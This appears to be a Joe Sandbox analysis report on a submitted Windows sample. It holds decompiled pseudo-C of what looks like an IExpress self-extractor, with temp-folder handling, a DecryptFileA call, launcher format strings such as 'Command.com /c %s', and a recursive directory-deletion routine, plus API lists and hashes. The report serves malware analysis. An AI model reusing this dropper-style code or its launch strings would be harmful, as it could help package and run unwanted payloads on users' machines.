                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                    • API String ID: 383838535-2112662285
                                                                                                                                                                                                    • Opcode ID: 342973ac97a7969ddae4281607ad45343571433b8bcd69707c7fc434397bf41d
                                                                                                                                                                                                    • Instruction ID: 09674bf573bb2df919d7dde66037bd2d173e430ab1c6fe771462060c434e249e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 342973ac97a7969ddae4281607ad45343571433b8bcd69707c7fc434397bf41d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCA138B0A002187BEB249B24CC45FEA7B79EF55310F1442A5F995A32D1DBB09EC6CB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 450 132f1d-132f3d 451 132f3f-132f46 450->451 452 132f6c-132f73 call 135164 450->452 454 132f48 call 1351e5 451->454 455 132f5f-132f66 call 133a3f 451->455 459 133041 452->459 460 132f79-132f80 call 1355a0 452->460 461 132f4d-132f4f 454->461 455->452 455->459 464 133043-133053 call 136ce0 459->464 460->459 468 132f86-132fbe GetSystemDirectoryA call 13658a LoadLibraryA 460->468 461->459 465 132f55-132f5d 461->465 465->452 465->455 472 132fc0-132fd4 GetProcAddress 468->472 473 132ff7-133004 FreeLibrary 468->473 472->473 474 132fd6-132fee DecryptFileA 472->474 475 133017-133024 SetCurrentDirectoryA 473->475 476 133006-13300c 473->476 474->473 489 132ff0-132ff5 474->489 477 133026-13303c call 1344b9 call 136285 475->477 478 133054-13305a 475->478 476->475 479 13300e call 13621e 476->479 477->459 483 133065-13306c 478->483 484 13305c call 133b26 478->484 485 133013-133015 479->485 486 13306e-133075 call 13256d 483->486 487 13307c-133089 483->487 495 133061-133063 484->495 485->459 485->475 496 13307a 486->496 492 1330a1-1330a9 487->492 493 13308b-133091 487->493 489->473 499 1330b4-1330b7 492->499 500 1330ab-1330ad 492->500 493->492 497 133093 call 133ba2 493->497 495->459 495->483 496->487 503 133098-13309a 497->503 499->464 500->499 502 1330af call 134169 500->502 502->499 503->459 505 13309c 503->505 505->492
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00132F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v272;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t47;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t43 = __edx;
                                                                                                                                                                                                    				_t9 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                    				if( *0x138a38 != 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					_t11 = E00135164(_t52);
                                                                                                                                                                                                    					_t53 = _t11;
                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						_t12 = 0;
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						return E00136CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t14 = E001355A0(_t53); // executed
                                                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t45 = 0x105;
                                                                                                                                                                                                    						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                    						_t43 = 0x105;
                                                                                                                                                                                                    						_t40 =  &_v272;
                                                                                                                                                                                                    						E0013658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                    						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                    						_t44 = 0;
                                                                                                                                                                                                    						if(_t36 != 0) {
                                                                                                                                                                                                    							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                    							_v276 = _t31;
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								_t45 = _t47;
                                                                                                                                                                                                    								_t40 = _t31;
                                                                                                                                                                                                    								 *0x13a288("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                    								_v276();
                                                                                                                                                                                                    								if(_t47 != _t47) {
                                                                                                                                                                                                    									_t40 = 4;
                                                                                                                                                                                                    									asm("int 0x29");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						FreeLibrary(_t36);
                                                                                                                                                                                                    						_t58 =  *0x138a24 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                    							if(_t21 != 0) {
                                                                                                                                                                                                    								__eflags =  *0x138a2c - _t44; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									__eflags =  *0x138d48 & 0x000000c0;
                                                                                                                                                                                                    									if(( *0x138d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                    										_t41 =  *0x139a40; // 0x3, executed
                                                                                                                                                                                                    										_t26 = E0013256D(_t41); // executed
                                                                                                                                                                                                    										_t44 = _t26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t22 =  *0x138a24; // 0x0
                                                                                                                                                                                                    									 *0x139a44 = _t44;
                                                                                                                                                                                                    									__eflags = _t22;
                                                                                                                                                                                                    									if(_t22 != 0) {
                                                                                                                                                                                                    										L26:
                                                                                                                                                                                                    										__eflags =  *0x138a38;
                                                                                                                                                                                                    										if( *0x138a38 == 0) {
                                                                                                                                                                                                    											__eflags = _t22;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												E00134169(__eflags);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t12 = 1;
                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags =  *0x139a30 - _t22; // 0x0
                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t25 = E00133BA2(); // executed
                                                                                                                                                                                                    										__eflags = _t25;
                                                                                                                                                                                                    										if(_t25 == 0) {
                                                                                                                                                                                                    											goto L16;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t22 =  *0x138a24; // 0x0
                                                                                                                                                                                                    										goto L26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t27 = E00133B26(_t40, _t44);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t43 = 0x4bc;
                                                                                                                                                                                                    							E001344B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                    							 *0x139124 = E00136285();
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t59 =  *0x139a30 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = E0013621E(); // executed
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t49 =  *0x138a24;
                                                                                                                                                                                                    				if( *0x138a24 != 0) {
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					_t34 = E00133A3F(_t51);
                                                                                                                                                                                                    					_t52 = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E001351E5(_t49) == 0) {
                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t51 =  *0x138a38;
                                                                                                                                                                                                    				if( *0x138a38 != 0) {
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                    			}




























                                                                                                                                                                                                    0x00132f1d
                                                                                                                                                                                                    0x00132f28
                                                                                                                                                                                                    0x00132f2f
                                                                                                                                                                                                    0x00132f3d
                                                                                                                                                                                                    0x00132f6c
                                                                                                                                                                                                    0x00132f6c
                                                                                                                                                                                                    0x00132f71
                                                                                                                                                                                                    0x00132f73
                                                                                                                                                                                                    0x00133041
                                                                                                                                                                                                    0x00133041
                                                                                                                                                                                                    0x00133043
                                                                                                                                                                                                    0x00133053
                                                                                                                                                                                                    0x00133053
                                                                                                                                                                                                    0x00132f79
                                                                                                                                                                                                    0x00132f80
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132f86
                                                                                                                                                                                                    0x00132f86
                                                                                                                                                                                                    0x00132f93
                                                                                                                                                                                                    0x00132f9e
                                                                                                                                                                                                    0x00132fa0
                                                                                                                                                                                                    0x00132fa6
                                                                                                                                                                                                    0x00132fb8
                                                                                                                                                                                                    0x00132fba
                                                                                                                                                                                                    0x00132fbe
                                                                                                                                                                                                    0x00132fc6
                                                                                                                                                                                                    0x00132fcc
                                                                                                                                                                                                    0x00132fd4
                                                                                                                                                                                                    0x00132fd6
                                                                                                                                                                                                    0x00132fd8
                                                                                                                                                                                                    0x00132fe0
                                                                                                                                                                                                    0x00132fe6
                                                                                                                                                                                                    0x00132fee
                                                                                                                                                                                                    0x00132ff0
                                                                                                                                                                                                    0x00132ff5
                                                                                                                                                                                                    0x00132ff5
                                                                                                                                                                                                    0x00132fee
                                                                                                                                                                                                    0x00132fd4
                                                                                                                                                                                                    0x00132ff8
                                                                                                                                                                                                    0x00132ffe
                                                                                                                                                                                                    0x00133004
                                                                                                                                                                                                    0x00133017
                                                                                                                                                                                                    0x0013301c
                                                                                                                                                                                                    0x00133024
                                                                                                                                                                                                    0x00133054
                                                                                                                                                                                                    0x0013305a
                                                                                                                                                                                                    0x00133065
                                                                                                                                                                                                    0x00133065
                                                                                                                                                                                                    0x0013306c
                                                                                                                                                                                                    0x0013306e
                                                                                                                                                                                                    0x00133075
                                                                                                                                                                                                    0x0013307a
                                                                                                                                                                                                    0x0013307a
                                                                                                                                                                                                    0x0013307c
                                                                                                                                                                                                    0x00133081
                                                                                                                                                                                                    0x00133087
                                                                                                                                                                                                    0x00133089
                                                                                                                                                                                                    0x001330a1
                                                                                                                                                                                                    0x001330a1
                                                                                                                                                                                                    0x001330a9
                                                                                                                                                                                                    0x001330ab
                                                                                                                                                                                                    0x001330ad
                                                                                                                                                                                                    0x001330af
                                                                                                                                                                                                    0x001330af
                                                                                                                                                                                                    0x001330ad
                                                                                                                                                                                                    0x001330b6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013308b
                                                                                                                                                                                                    0x0013308b
                                                                                                                                                                                                    0x00133091
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133093
                                                                                                                                                                                                    0x00133098
                                                                                                                                                                                                    0x0013309a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013309c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013309c
                                                                                                                                                                                                    0x00133089
                                                                                                                                                                                                    0x0013305c
                                                                                                                                                                                                    0x00133061
                                                                                                                                                                                                    0x00133063
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133063
                                                                                                                                                                                                    0x0013302b
                                                                                                                                                                                                    0x00133032
                                                                                                                                                                                                    0x0013303c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013303c
                                                                                                                                                                                                    0x00133006
                                                                                                                                                                                                    0x0013300c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013300e
                                                                                                                                                                                                    0x00133015
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133015
                                                                                                                                                                                                    0x00132f80
                                                                                                                                                                                                    0x00132f3f
                                                                                                                                                                                                    0x00132f46
                                                                                                                                                                                                    0x00132f5f
                                                                                                                                                                                                    0x00132f5f
                                                                                                                                                                                                    0x00132f64
                                                                                                                                                                                                    0x00132f66
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132f66
                                                                                                                                                                                                    0x00132f4f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132f55
                                                                                                                                                                                                    0x00132f5d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00132F93
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00132FB2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00132FC6
                                                                                                                                                                                                    • DecryptFileA.ADVAPI32 ref: 00132FE6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00132FF8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0013301C
                                                                                                                                                                                                      • Part of subcall function 001351E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00132F4D,?,00000002,00000000), ref: 00135201
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2126469477-1002207402
                                                                                                                                                                                                    • Opcode ID: cb7d6c583aa241ca66bd5c419af457ab858fab114a859b3216925f6dffd33baf
                                                                                                                                                                                                    • Instruction ID: feffddb03ad88e97e8572a6b3d2ecfe4d651ceec24f39ba7ec55fe3900fda771
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb7d6c583aa241ca66bd5c419af457ab858fab114a859b3216925f6dffd33baf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA41D331A003059BDB38BB71EC49A6A77A8DF64750F100165F991D3991EFB4CFC0CA65
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E00132390(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    				int _t36;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                    				_t21 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                    				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                    				_t65 = __ecx;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_pop(_t62);
                                                                                                                                                                                                    					_pop(_t66);
                                                                                                                                                                                                    					_pop(_t46);
                                                                                                                                                                                                    					return E00136CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E00131680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                    					_t58 = 0x104;
                                                                                                                                                                                                    					E001316B3( &_v280, 0x104, "*");
                                                                                                                                                                                                    					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                    					_t63 = _t22;
                                                                                                                                                                                                    					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t58 = 0x104;
                                                                                                                                                                                                    						E00131680( &_v276, 0x104, _t65);
                                                                                                                                                                                                    						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                    							_t58 = 0x104;
                                                                                                                                                                                                    							E001316B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                    							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                    							DeleteFileA( &_v280);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                    								E001316B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                    								_t58 = 0x104;
                                                                                                                                                                                                    								E0013658A( &_v280, 0x104, 0x131140);
                                                                                                                                                                                                    								E00132390( &_v284);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                    					} while (_t36 != 0);
                                                                                                                                                                                                    					FindClose(_t63); // executed
                                                                                                                                                                                                    					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





















                                                                                                                                                                                                    0x00132398
                                                                                                                                                                                                    0x0013239e
                                                                                                                                                                                                    0x001323a3
                                                                                                                                                                                                    0x001323a5
                                                                                                                                                                                                    0x001323ae
                                                                                                                                                                                                    0x001323b3
                                                                                                                                                                                                    0x001324cb
                                                                                                                                                                                                    0x001324d2
                                                                                                                                                                                                    0x001324d3
                                                                                                                                                                                                    0x001324d4
                                                                                                                                                                                                    0x001324df
                                                                                                                                                                                                    0x001323c2
                                                                                                                                                                                                    0x001323d1
                                                                                                                                                                                                    0x001323db
                                                                                                                                                                                                    0x001323e4
                                                                                                                                                                                                    0x001323f6
                                                                                                                                                                                                    0x001323fc
                                                                                                                                                                                                    0x00132401
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132407
                                                                                                                                                                                                    0x00132407
                                                                                                                                                                                                    0x00132408
                                                                                                                                                                                                    0x00132411
                                                                                                                                                                                                    0x0013241f
                                                                                                                                                                                                    0x0013247a
                                                                                                                                                                                                    0x00132483
                                                                                                                                                                                                    0x00132495
                                                                                                                                                                                                    0x001324a3
                                                                                                                                                                                                    0x00132421
                                                                                                                                                                                                    0x0013242f
                                                                                                                                                                                                    0x00132453
                                                                                                                                                                                                    0x0013245d
                                                                                                                                                                                                    0x00132466
                                                                                                                                                                                                    0x00132472
                                                                                                                                                                                                    0x00132472
                                                                                                                                                                                                    0x0013242f
                                                                                                                                                                                                    0x001324af
                                                                                                                                                                                                    0x001324b5
                                                                                                                                                                                                    0x001324be
                                                                                                                                                                                                    0x001324c5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001324c5

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,00138A3A,001311F4,00138A3A,00000000,?,?), ref: 001323F6
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,001311F8), ref: 00132427
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,001311FC), ref: 0013243B
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00132495
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 001324A3
                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00000000,00000010), ref: 001324AF
                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 001324BE
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(00138A3A), ref: 001324C5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                    • Opcode ID: 59518a50a88ecf73e88a593cf83f228c49f0f735183c14a2740e1e921eea1f62
                                                                                                                                                                                                    • Instruction ID: de9c14248ad6e686fea2bd7aeb849bc8d7d3b814a8ec098709e917f433c2688f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59518a50a88ecf73e88a593cf83f228c49f0f735183c14a2740e1e921eea1f62
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9731A272604740ABD320EBA4CC8AAEBB7ECAFD4305F44492DF59587290EB74D94DC792
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                    			E00132BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				struct HINSTANCE__* _t12;
                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                    				signed char _t19;
                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                    				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                    					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                    							_t17 = _t21;
                                                                                                                                                                                                    							 *0x13a288(0, 1, 0, 0);
                                                                                                                                                                                                    							 *_t21();
                                                                                                                                                                                                    							_t29 = _t24 - _t24;
                                                                                                                                                                                                    							if(_t24 != _t24) {
                                                                                                                                                                                                    								_t17 = 4;
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t20 = _a12;
                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                    				 *0x139124 = 0;
                                                                                                                                                                                                    				if(E00132CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                    					_t9 = E00132F1D(_t18, _t20); // executed
                                                                                                                                                                                                    					_t22 = _t9; // executed
                                                                                                                                                                                                    					E001352B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                    					if(_t22 != 0) {
                                                                                                                                                                                                    						_t32 =  *0x138a3a; // 0x0
                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                    							_t19 =  *0x139a2c; // 0x0
                                                                                                                                                                                                    							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                    								E00131F90(_t19, _t21, _t22);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t6 =  *0x138588; // 0x0
                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 =  *0x139124; // 0x80070002
                                                                                                                                                                                                    				return _t7;
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00132c03
                                                                                                                                                                                                    0x00132c0d
                                                                                                                                                                                                    0x00132c18
                                                                                                                                                                                                    0x00132c20
                                                                                                                                                                                                    0x00132c2e
                                                                                                                                                                                                    0x00132c32
                                                                                                                                                                                                    0x00132c36
                                                                                                                                                                                                    0x00132c3d
                                                                                                                                                                                                    0x00132c43
                                                                                                                                                                                                    0x00132c45
                                                                                                                                                                                                    0x00132c47
                                                                                                                                                                                                    0x00132c49
                                                                                                                                                                                                    0x00132c4e
                                                                                                                                                                                                    0x00132c4e
                                                                                                                                                                                                    0x00132c47
                                                                                                                                                                                                    0x00132c32
                                                                                                                                                                                                    0x00132c20
                                                                                                                                                                                                    0x00132c50
                                                                                                                                                                                                    0x00132c54
                                                                                                                                                                                                    0x00132c57
                                                                                                                                                                                                    0x00132c64
                                                                                                                                                                                                    0x00132c66
                                                                                                                                                                                                    0x00132c6b
                                                                                                                                                                                                    0x00132c6d
                                                                                                                                                                                                    0x00132c74
                                                                                                                                                                                                    0x00132c76
                                                                                                                                                                                                    0x00132c7c
                                                                                                                                                                                                    0x00132c7e
                                                                                                                                                                                                    0x00132c87
                                                                                                                                                                                                    0x00132c89
